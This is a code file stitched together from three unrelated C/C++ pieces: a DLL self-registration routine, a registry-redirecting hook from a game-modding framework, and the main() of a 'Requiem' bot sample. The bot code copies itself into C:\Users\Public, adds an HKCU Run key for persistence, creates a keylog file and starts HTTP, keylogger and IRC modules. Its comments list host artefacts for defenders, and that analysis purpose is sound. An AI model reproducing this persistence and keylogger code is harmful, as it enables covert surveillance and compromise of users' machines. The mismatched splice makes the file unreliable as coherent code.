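// Records this module's on-disk path in the "Path" value under
// HKEY_CURRENT_USER\<MOZILLA_REG_KEY>.
//
// Returns S_OK on success, otherwise an HRESULT built from the Win32 error of
// the call that failed, so a registration that did not happen is not reported
// as successful.
//
// NOTE(review): HKCU is writable by the current user without elevation. If any
// consumer later loads or executes the file named by this value, it is trusting
// user-controlled data; confirm the reader validates the path.
extern "C" STDAPI DllRegisterServer() {
  WCHAR path[MAX_PATH];

  // The size argument of GetModuleFileName is a count of characters, not
  // bytes. sizeof(path) would advertise twice the real capacity and allow a
  // write past the end of the buffer for long module paths.
  const DWORD capacity = ARRAYSIZE(path);
  const DWORD length = GetModuleFileName(globalInstance_, path, capacity);
  if (length == 0) {
    return HRESULT_FROM_WIN32(GetLastError());
  }
  if (length >= capacity) {
    // The path was truncated; registering a partial path would point the
    // registry value at a different (possibly attacker-creatable) location.
    return HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER);
  }

  // REG_SZ data length is given in bytes and includes the terminating NUL.
  const DWORD path_size = (length + 1) * sizeof(WCHAR);
  const LSTATUS status = RegSetKeyValue(HKEY_CURRENT_USER, MOZILLA_REG_KEY,
                                        L"Path", REG_SZ, path, path_size);
  return HRESULT_FROM_WIN32(status);
}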
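// Replacement for RegOpenKeyExA (the original is reached through
// g_origRegOpenKeyExA).
//
// Behaviour, as visible in this function:
//  - When the caller opens a subkey named "AppId_Catalog" (case-insensitive),
//    the hook writes this process's executable path ("AppFullPath") and a
//    "PermittedLspCategories" DWORD into
//    HKCU\SOFTWARE\CitizenFX\AppID_Catalog, then opens and returns THAT key
//    instead of the requested one. The returned handle is remembered per
//    thread.
//  - On a later open relative to the remembered handle, a subKey without a
//    '-' is answered by reopening the same key (empty subkey), and the
//    remembered handle is cleared.
//  - Every other call is forwarded unchanged.
//
// Parameters and return value are those of RegOpenKeyExA.
//
// NOTE(review): 0x80000000 looks like the LSP_SYSTEM category flag; confirm
// against the SDK headers. The redirected key lives in HKCU, so its contents
// are controlled by the current user, not by an administrator.
LONG WINAPI ProcessLSPRegOpenKeyExA(HKEY key, const char* subKey, DWORD options, REGSAM samDesired, PHKEY outKey)
{
	static thread_local HKEY lastLSPKey = (HKEY)-1;

	if (subKey && !_stricmp(subKey, "AppId_Catalog"))
	{
		static const wchar_t catalogKey[] = L"SOFTWARE\\CitizenFX\\AppID_Catalog";

		wchar_t modulePath[512];
		const DWORD capacity = sizeof(modulePath) / sizeof(modulePath[0]);
		const DWORD length = GetModuleFileName(GetModuleHandle(nullptr), modulePath, capacity);

		// Only store the path when the call succeeded and was not truncated;
		// otherwise modulePath may be uninitialised or incomplete, and
		// measuring it with wcslen would read indeterminate memory.
		if (length > 0 && length < capacity)
		{
			RegSetKeyValue(HKEY_CURRENT_USER, catalogKey, L"AppFullPath", REG_SZ,
				modulePath, static_cast<DWORD>((length + 1) * sizeof(wchar_t)));
		}

		DWORD permittedCategories = 0x80000000;
		RegSetKeyValue(HKEY_CURRENT_USER, catalogKey, L"PermittedLspCategories", REG_DWORD,
			&permittedCategories, sizeof(permittedCategories));

		LONG status = g_origRegOpenKeyExA(HKEY_CURRENT_USER, "SOFTWARE\\CitizenFX\\AppID_Catalog", options, samDesired, outKey);

		// *outKey is only meaningful after a successful open; never remember
		// a handle from a failed call or dereference a null out-pointer.
		lastLSPKey = (status == ERROR_SUCCESS && outKey) ? *outKey : (HKEY)-1;

		return status;
	}

	// subKey may legitimately be null for RegOpenKeyExA; such calls are
	// forwarded untouched rather than passed to strchr.
	if (key == lastLSPKey && subKey && !strchr(subKey, '-'))
	{
		LONG status = g_origRegOpenKeyExA(key, "", options, samDesired, outKey);

		lastLSPKey = (HKEY)-1;

		return status;
	}

	return g_origRegOpenKeyExA(key, subKey, options, samDesired, outKey);
}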
/*
 * Entry point of the bot sample shown on this page, annotated for analysis.
 *
 * What the visible code does, in order:
 *   1. Builds a working-directory path "C:\Users\Public\<_folderName>".
 *   2. If CreateDirectory succeeds (the call fails when the directory already
 *      exists, so this branch is the first-run path), it creates a debug log,
 *      copies the running executable to "<dir>\Requiem.exe" and, when the copy
 *      succeeds, writes a value named "Requiem" under
 *      HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
 *   3. Creates the keylog file and writes a start banner to it.
 *   4. Calls the start-up routine of each module whose header guard macro is
 *      defined (RQHTTP_H, KEYLOG_H, RQIRC_H).
 *
 * Host artefacts a defender can look for, all taken from the literals below:
 *   - a new directory directly under C:\Users\Public;
 *   - a file named Requiem.exe inside it;
 *   - an HKCU Run value named "Requiem" whose data points at that file;
 *   - log lines beginning with "[CORE]: ".
 * Monitoring writes to the per-user Run key and executable creation under
 * C:\Users\Public covers the persistence step regardless of the names used.
 *
 * _folderName, _fileName, _keylogFile, keylogDir and keylogHandle are not
 * declared in this excerpt; presumably they are defined elsewhere in the
 * project.
 */
int main() {
    HANDLE keylogFile, debugFile;
    char tempDirName[MAX_PATH];
    sprintf(tempDirName, "%s\\%s", "C:\\Users\\Public", _folderName); //Store the folder location into tempDirName
    if (CreateDirectory(tempDirName, NULL)) { //If folder does not exist create it and create the debug file as well.
        char tempFileName[MAX_PATH];
        char buffer[] = "[CORE]: Bot Started \n";
        DWORD bytesWritten = 0;
        sprintf(tempFileName, "%s\\%s", tempDirName, _fileName); //Store whole path name in tempFileName
        debugFile = CreateFile(tempFileName, GENERIC_ALL, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL); //Create debug file
        WriteFile(debugFile, buffer, sizeof(buffer) - 1, &bytesWritten, NULL); //Write to debug file
        char modFileName[MAX_PATH]; //Get current exe path name so we can copy it to the new folder we created
        GetModuleFileName(NULL, modFileName, sizeof(modFileName));
        char tempExeName[MAX_PATH]; //Set this equal to our new folder name + requiem as the exe name
        sprintf(tempExeName, "%s\\%s", tempDirName, "Requiem.exe");
        if (CopyFile(modFileName, tempExeName, TRUE)) //Copy our current program into the new directory so it can be run at startup
        {
            char lpData[MAX_PATH];//Create registry key to autorun bot
            // Persistence: per-user Run value, so no elevation is needed to set it.
            // The data length passed is sizeof(tempExeName), i.e. the whole
            // MAX_PATH buffer rather than the string length, so the stored value
            // is MAX_PATH bytes long - a size mismatch that is itself a triage hint.
            RegSetKeyValue(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Requiem", REG_SZ, (LPBYTE)&tempExeName, sizeof(tempExeName));
            char bytesToWrite[] = "[CORE]: Registry Key Added \n"; //Write to debug file
            WriteFile(debugFile, bytesToWrite, sizeof(bytesToWrite) - 1, &bytesWritten, NULL);
        }
    }
    char tempKeylogFileName[MAX_PATH];
    // Keylog file path is built inside the same working directory.
    sprintf(keylogDir, "%s\\%s", tempDirName, _keylogFile);
    // CREATE_NEW: the banner below is only written when the file did not exist yet.
    if (keylogHandle = CreateFile(keylogDir, GENERIC_ALL, FILE_SHARE_WRITE, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL)) {
        char buffer[] = "[CORE]: Keylogger started \n";
        DWORD bytesWritten = 0;
        WriteFile(keylogHandle, buffer, sizeof(buffer) - 1, &bytesWritten, NULL);
        CloseHandle(keylogHandle);
    }
    //keylogHandle = CreateFile(tempKeylogFileName, GENERIC_ALL, FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    //module startups
    // Each module is compiled in only when its header guard macro is defined,
    // so a given build may contain any subset of HTTP, keylog and IRC.
#ifdef RQHTTP_H
    http_startup();
#endif
#ifdef KEYLOG_H
    keylog_startup();
#endif
#ifdef RQIRC_H
    irc_startup();
#endif
    return 0;
}